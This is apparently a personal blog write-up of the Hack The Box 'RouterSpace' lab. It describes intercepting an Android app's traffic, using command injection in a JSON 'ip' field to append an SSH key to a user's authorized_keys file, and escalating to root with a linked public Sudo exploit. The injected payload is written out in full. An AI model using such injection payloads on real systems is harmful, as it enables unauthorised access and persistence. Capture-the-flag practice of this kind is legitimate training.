• Donald Ashdown

Hack the Box Router Space

Engagement flow


Enumeration
  1. Port discovery

  2. Web enumeration

  3. apk download



Browsing to the website we see options for a download and a get started now.


We download the provided apk.


From this we install and run anbox on our target. Once anbox is opened, we have to install the actual .apk.


User

We have to change our network information in order to intercept and proxy the request with burp suite.


https://github.com/anbox/anbox/issues/398



adb shell settings put global http_proxy 192.168.250.1:8080



This did not work. After some review I realized the host was routerspace.htb and this needed to be added to the /etc/hosts file.





I was not able to gain a reverse shell so I injected my SSH key instead.



{"ip":"0.0.0.0 | echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDCu8ID9aG93wVDfA3M7x6McWMDGvzVC4LlWjoDZtJ33Xpzi7483Dxt4+WczJdCAlWJKw1In4Orc1QcINCHBy6hK0UteKU3OevHn9IhpyoZF1FsFi/zo6brldA4pSTOBBT6zDf3VzVtgEwkRe5YaLZLMoD/lBvYLKyboJcQ90zTwBcNEL029b5a1YLx/ZZcTgaZEOKrC7rck9l3uu9rW8pqGTrm/kkV7ad+CrH4tHil4uNnkVSQp6BA1oQh1xAuCvq494zZu5Z+sqOsHzMKp7U4ZvAG1vKxZdMSyKYp13kftK2Yj+dWDpIYZZqy0tqz1duSmgd7LK+dxc7wGOV6+FPqp4YcnY4xfnbKwh1WPZnL7EvYIzHqI4IYww7IMYBw2R+/+CtQpFj+rmX0FHUEPpu9YSjvC4o1N7pzo6/F8pIn7HjEiOg1vcwotCF3RM5UG2fkX0PdHJTXH9EL8lm351qkilf00ZFsZ8ovlvVtoIdcN0mwuh9I/1GeyDey2kmYC9c= kali@kali' >> /home/paul/.ssh/authorized_keys"}



Root

From here we are not able to get the linpeas script uploaded so we pivot and enumerate manually. Checking the Sudo version and researching this version shows us a known CVE.

https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit


We copy the 3 files onto our target machine. and run make followed by exploit and we are root!


6 views0 comments